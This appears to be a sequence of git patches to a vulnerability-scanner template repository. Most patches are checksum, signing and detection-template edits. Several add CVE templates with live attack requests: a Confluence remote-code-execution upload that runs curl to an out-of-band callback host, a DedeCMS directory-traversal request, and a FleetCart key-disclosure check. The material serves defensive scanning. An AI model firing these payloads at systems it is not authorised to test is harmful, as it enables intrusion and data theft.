-http/vulnerabilities/other/cerio-dt-rce.yaml:f3184ec767f634d6e174fa303e67b3c5866236f7 +http/vulnerabilities/other/cerio-dt-rce.yaml:e565744efe12c9b0deb5f8898a7d9bf30a334a43 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml:bb592cb50df3e8b218c8c655b5a4ce12d1abf72c @@ -8561,7 +8561,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ded924c130659798c79761c79766daf4ed16044f +templates-checksum.txt:e89606811038565c91885dfdfe6ffe0b132c0ce7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1e85d764314545e7893d407058df34f1aa2e7124 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:51:39 +0000 Subject: [PATCH 230/847] Auto Template Signing [Fri May 24 06:51:39 UTC 2024] :robot: --- http/takeovers/flexbe-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 216b1c828f..114552775f 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f23c68360f3c8ffde41189aeb0c5571b3c4ad3e7c2e9b9c0afce192211737d2b022024647b913ab69f9aad45be5b47bc86466c29cce9c87a3f3d5315394e320d4d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6ba053e1aee16bc9926d7ba8e048d813b60d197b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 12:43:39 +0530 Subject: [PATCH 231/847] Delete http/exposed-panels/osnexus-quantastor-management-console.yaml --- ...osnexus-quantastor-management-console.yaml | 37 ------------------- 1 file changed, 37 deletions(-) delete mode 100644 http/exposed-panels/osnexus-quantastor-management-console.yaml diff --git a/http/exposed-panels/osnexus-quantastor-management-console.yaml b/http/exposed-panels/osnexus-quantastor-management-console.yaml deleted file mode 100644 index b1246ca697..0000000000 --- a/http/exposed-panels/osnexus-quantastor-management-console.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: osnexus-quantastor-management-console - -info: - name: OSNEXUS QuantaStor Management Console - Detect - author: Charles D - severity: info - description: OSNEXUS QuantaStor Management Console was detected - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"OS NEXUS QuantaStor Manager" - tags: management-console,login,osnexus-quantastor,osnexus - -http: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "OS NEXUS QuantaStor Manager" - part: body - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - "'name="qsversion" content="([^"]+)"'" From 41fe0680d8cba4df76136eb2aaa6c939d926c41c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 12:48:07 +0530 Subject: [PATCH 232/847] Update vrealize-hyperic-login-panel.yaml --- http/exposed-panels/vrealize-hyperic-login-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index d8fc286fe9..0938e0eb52 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -10,10 +10,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Sign In - Hyperic" - verified: true - tags: login,panel,vrealize,hyperic + tags: login,panel,vrealize,hyperic,detect http: - method: GET From 4c857e4fdca5a3b0b208863ca3279d0a00110e14 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:02:24 +0530 Subject: [PATCH 233/847] FP-Fix erlang-daemon.yaml --- network/misconfig/erlang-daemon.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index 1a29de35b9..d532249ad2 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -24,9 +24,16 @@ tcp: - "{{Hostname}}" port: 4369 + matchers: + - type: word + words: + - "HTTP/1.1" + negative: true + + extractors: - type: dsl name: default-instances dsl: - trim(raw, '[ ]') -# digest: 4a0a004730450220355188af0f9857f623bc4acc4a4be1bf35256e1aada20409924789891020dc19022100f4de4851b2259ca96fef0a174af79c129a8fc270ee9a965b22422c0d1d0e6d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220355188af0f9857f623bc4acc4a4be1bf35256e1aada20409924789891020dc19022100f4de4851b2259ca96fef0a174af79c129a8fc270ee9a965b22422c0d1d0e6d3b:922c64590222798bb761d5b6d8e72950 From e67247c9fcaff3461ae000f0b41e5a0aba71774d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:29:59 +0530 Subject: [PATCH 234/847] lint -fix --- network/misconfig/erlang-daemon.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index d532249ad2..8e25e56b52 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -29,7 +29,6 @@ tcp: words: - "HTTP/1.1" negative: true - extractors: - type: dsl From bc290458b4c4f8f3ca185a21eda9d0544414d8f3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:32:57 +0530 Subject: [PATCH 235/847] Update minecraft-enum.yaml --- javascript/enumeration/minecraft-enum.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index 0ef5ff5f1d..51afd01965 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -36,8 +36,13 @@ javascript: dsl: - "success == true" + - type: word + words: + - "HTTP/1.1" + negative: true + extractors: - type: dsl dsl: - response -# digest: 4b0a0048304602210097a010ea589db898dd8dfb9813cef0ddf6a92c583644a11ed95aa50ef8147b28022100ea4cfe825571c9cf2c1afc8dd0db45993bbd5e5b5145b18485b60ea965d66fc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097a010ea589db898dd8dfb9813cef0ddf6a92c583644a11ed95aa50ef8147b28022100ea4cfe825571c9cf2c1afc8dd0db45993bbd5e5b5145b18485b60ea965d66fc1:922c64590222798bb761d5b6d8e72950 From 0d0e50f17da8b181ccdc23622f696bf86819789a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:41:23 +0530 Subject: [PATCH 236/847] Update minecraft-enum.yaml --- javascript/enumeration/minecraft-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index 51afd01965..c5baa4a68a 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -36,7 +36,7 @@ javascript: dsl: - "success == true" - - type: word + - type: word words: - "HTTP/1.1" negative: true From 9e302bdefc56b151be23cda47f2e24695624b935 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:18:03 +0000 Subject: [PATCH 238/847] Auto Generated Templates Checksum [Fri May 24 10:18:03 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2066f0b78..1b3afe157a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6537,7 +6537,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:7f0d8cd2e79c498ac544390dd9f4e0f7db448bcc +http/takeovers/flexbe-takeover.yaml:2c453090252f72ffe9b6e7671c5b8fad6db6f8f8 http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -8506,7 +8506,7 @@ network/misconfig/apache-dubbo-unauth.yaml:622efcfac18e7a5b1ece09a1d8a34d857d6bc network/misconfig/apache-rocketmq-broker-unauth.yaml:f6421f83ae1682e3561d7492aa5140e80e8586a7 network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 -network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c +network/misconfig/erlang-daemon.yaml:59020097f30b5b63b868a37ff9feda5c7f9481ea network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a @@ -8561,7 +8561,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e89606811038565c91885dfdfe6ffe0b132c0ce7 +templates-checksum.txt:03be6a57e0cefd4e293a93ff4bd3cf23df20c70a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From aa2fe8d7db78c6b8a43600b7c670fb678fa42bca Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:19:28 +0000 Subject: [PATCH 239/847] Auto Generated New Template Addition List [Fri May 24 10:19:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b9e19bdf1d..b6bed47268 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2022/CVE-2022-1580.yaml +http/cves/2023/CVE-2023-48084.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From b602c91b558547dda7e58be481d8a01c5a278edc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:19:35 +0000 Subject: [PATCH 240/847] Auto Generated Templates Checksum [Fri May 24 10:19:35 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1b3afe157a..59c899e8e8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3192,6 +3192,7 @@ http/cves/2023/CVE-2023-47218.yaml:17dcf8eb7f320608649c5031de12070b46a11ebf http/cves/2023/CVE-2023-47246.yaml:87b56eba15f5c19a9a03e679fb770600520ea2d1 http/cves/2023/CVE-2023-47643.yaml:77261db868e2b2788787eb158eb22f6238707b3c http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e +http/cves/2023/CVE-2023-48084.yaml:0b242dabc8934b6ed10bd722d950d3e6b19516d6 http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 @@ -8561,7 +8562,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:03be6a57e0cefd4e293a93ff4bd3cf23df20c70a +templates-checksum.txt:104a05345b6f53f2e99ddf5cf8b804cfd40199e9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 881e215f4c874bf74e053b5674c7d24a314aa578 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:19:46 +0000 Subject: [PATCH 241/847] Auto Template Signing [Fri May 24 10:19:46 UTC 2024] :robot: --- network/misconfig/erlang-daemon.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index 8e25e56b52..3e37bd1c95 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -35,4 +35,4 @@ tcp: name: default-instances dsl: - trim(raw, '[ ]') -# digest: 4a0a004730450220355188af0f9857f623bc4acc4a4be1bf35256e1aada20409924789891020dc19022100f4de4851b2259ca96fef0a174af79c129a8fc270ee9a965b22422c0d1d0e6d3b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205e3d32aaa31805fb16eb5543fd1703da066ed645af6aadfa0048cbec4525f7da022100dcf07bf261985800a8875b8db6ec143915468d2c165a99ff3ee32319011ca354:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d1d67caa4d9249ef6673a0273de027db2b3af2b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:20:09 +0000 Subject: [PATCH 242/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 446dd43db4..42c5934e11 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From b6f4b20db5a69e4751473ed33ac97ace98003f48 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:23:09 +0000 Subject: [PATCH 243/847] Auto Generated New Template Addition List [Fri May 24 10:23:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b6bed47268..d3ddae9e78 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-48084.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml +http/exposed-panels/vrealize-hyperic-login-panel.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From f2f300f23f64e808350dbde8fe51565ac1e7abe6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:23:15 +0000 Subject: [PATCH 244/847] Auto Generated Templates Checksum [Fri May 24 10:23:15 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 59c899e8e8..dac3af48e3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4512,6 +4512,7 @@ http/exposed-panels/vmware-vcenter-converter-standalone.yaml:afd6381e2632114b860 http/exposed-panels/vmware-vcloud-director.yaml:1cc3968a991cd6cc1df9ef69bce9855ce0263481 http/exposed-panels/vodafone-voxui-panel.yaml:8c1897eb27b8ad1df6322dcfff01cfe403fc7e94 http/exposed-panels/voipmonitor-panel.yaml:e71536ce7d33bdb21196e43d271599461210c00c +http/exposed-panels/vrealize-hyperic-login-panel.yaml:93e0073e433d8250100aad758f563f4222537620 http/exposed-panels/vrealize-loginsight-panel.yaml:fd0b96b27df826ead5e909036f608a45b8fdee99 http/exposed-panels/vue-pacs-panel.yaml:a9409187ebedd24db1b6fe057b87c234ba5cf34a http/exposed-panels/wago-plc-panel.yaml:408e8ec5941005afb61d1f1b11501fefcf33b946 @@ -8507,7 +8508,7 @@ network/misconfig/apache-dubbo-unauth.yaml:622efcfac18e7a5b1ece09a1d8a34d857d6bc network/misconfig/apache-rocketmq-broker-unauth.yaml:f6421f83ae1682e3561d7492aa5140e80e8586a7 network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 -network/misconfig/erlang-daemon.yaml:59020097f30b5b63b868a37ff9feda5c7f9481ea +network/misconfig/erlang-daemon.yaml:6b5ce18b01c5ea4d816aec8292ad974940e9e880 network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a @@ -8562,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:104a05345b6f53f2e99ddf5cf8b804cfd40199e9 +templates-checksum.txt:691c0dd076917a771f3a15fb973a7866a85d1f5a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6c40d5b8e9fae3cce9b92a6fc0c1e5204304549d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:23:55 +0000 Subject: [PATCH 245/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 42c5934e11..6ea040fb02 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' + - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: jobs: From 9afec19a5ea05575bda637ba61e8b68e3574e0a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:25:05 +0000 Subject: [PATCH 246/847] Auto Template Signing [Fri May 24 10:25:05 UTC 2024] :robot: --- http/cves/2023/CVE-2023-48084.yaml | 1 + http/exposed-panels/vrealize-hyperic-login-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 5c4c293207..67ded92e4f 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -68,3 +68,4 @@ http: regex: - 'name="nsp" value="(.*)">' internal: true +# digest: 4a0a0047304502204fbd6201bf925ccc24095849207a7b720d4bc11d315f598c77f8d89bf49bf70b022100dd8640ebaef3939c2317cc833a62e524308e3f0b1037da30858e14db33d28577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index 0938e0eb52..39d213a994 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402206fbf5a90bc0ea990171212b454ce657bff2b79cb0e2c4473be28d8b330d410150220495745350f17a240b57809e2ed71db324b465e69f2b2d8b2ea467dd46f8ff202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b3edbffef844858faa5052bb606b784103dfcccf Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 24 May 2024 18:12:07 +0300 Subject: [PATCH 247/847] cve-2024-5230 --- http/cves/2024/CVE-2024-5230.yaml | 33 +++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/cves/2024/CVE-2024-5230.yaml diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml new file mode 100644 index 0000000000..d9b6f5a47c --- /dev/null +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -0,0 +1,33 @@ +id: CVE-2024-5230 +info: + name: FleetCart 4.1.1 - Information Disclosure + author: securityforeveryone + severity: medium + description: | + Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the "Razorpay" "razorpayKeyId". + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5230 + - https://packetstormsecurity.com/files/178770/FleetCart-4.1.1-Information-Disclosure.html + - https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-5230 + cwe-id: CWE-200 + epss-score: 0.00045 + epss-percentile: 0.15047 + tags: packetstorm,cms,fleetcart + +http: + - method: GET + path: + - "{{BaseURL}}/en/products?query=123" + + matchers: + - type: dsl + dsl: + - 'contains(body, "razorpayKeyId:")' + - 'contains(body, "loggedIn:")' + - 'contains(body, "storeName:")' + - 'status_code == 200' + condition: and From 809df087260350d00d8491bca448bd2dcd28b957 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 25 May 2024 02:52:59 +0530 Subject: [PATCH 248/847] Create CVE-2024-21683.yaml --- http/cves/2024/CVE-2024-21683.yaml | 64 ++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 http/cves/2024/CVE-2024-21683.yaml diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml new file mode 100644 index 0000000000..690ddc2f10 --- /dev/null +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -0,0 +1,64 @@ +id: CVE-2024-21683 + +info: + name: Atlassian Confluence Data Center and Server - Remote Code Execution + author: pdresearch + severity: high + description: | + Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code. + reference: + - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html + - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated + - https://nvd.nist.gov/vuln/detail/CVE-2024-21683 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.3 + cve-id: CVE-2024-21683 + cwe-id: CWE-78 + tags: cve,cve2024,atlassian,confluence,rce,authenticated + +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + POST /dologin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + os_username={{username}}&os_password={{password}}&login=Log+in&os_destination= + + - | + POST /doauthenticate.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Atlassian-Token: no-check + + password={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action + + - | + POST /admin/plugins/newcode/addlanguage.action HTTP/1.1 + Host: {{Hostname}} + X-Atlassian-Token: no-check + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE + + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE + Content-Disposition: form-data; name="languageFile";filename="{{randstr}}.js" + Content-type: text/javascript + + new java.lang.ProcessBuilder["(java.lang.String[])"](["curl","{{interactsh-url}}"]).start() + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE + Content-Disposition: form-data; name="newLanguageName" + + {{randstr}} + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE-- + + matchers: + - type: dsl + dsl: + - status_code_1 == 302 && status_code_2 == 302 + - contains(interactsh_protocol, 'dns') + - contains(body_3, "confluence") + condition: and From 147d7c51bc7b1d956b119be5bc989a2f192c7f29 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 26 May 2024 00:45:57 +0530 Subject: [PATCH 249/847] Create CVE-2023-2059.yaml --- http/cves/2023/CVE-2023-2059.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2059.yaml diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml new file mode 100644 index 0000000000..a1240e2f7c --- /dev/null +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-2059 + +info: + name: DedeCMS 5.7.87 - Directory Traversal Vulnerability + author: pussycat0x + severity: medium + description: | + Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter. + reference: + - https://github.com/ATZXC-RedTeam/cve/blob/main/dedecms.md + - https://vuldb.com/?ctiid.225944 + - https://vuldb.com/?id.225944 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-2059 + cwe-id: CWE-28 + epss-score: 0.00107 + epss-percentile: 0.42813 + cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:* + metadata: + vendor: dedecms + product: dedecms + fofa-query: app="DedeCMS" + tags: cve,cve2023,dedecms + +http: + - raw: + - | + GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\..\..\ HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "dirname(__FILE__)" + - "$cfg_basedir" + condition: and + + - type: status + status: + - 200 From b3d24fcd8af0c948b5a6c45a0aaacfb556329b8d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 26 May 2024 00:48:50 +0530 Subject: [PATCH 250/847] lint -fix --- http/cves/2023/CVE-2023-2059.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index a1240e2f7c..7d5cf4ebcc 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -22,7 +22,7 @@ info: vendor: dedecms product: dedecms fofa-query: app="DedeCMS" - tags: cve,cve2023,dedecms + tags: cve,cve2023,dedecms http: - raw: @@ -38,7 +38,7 @@ http: - "dirname(__FILE__)" - "$cfg_basedir" condition: and - + - type: status status: - 200 From 5f13c86b2101a6440cfc3266b4a962ce1b294417 Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 09:04:43 +0330 Subject: 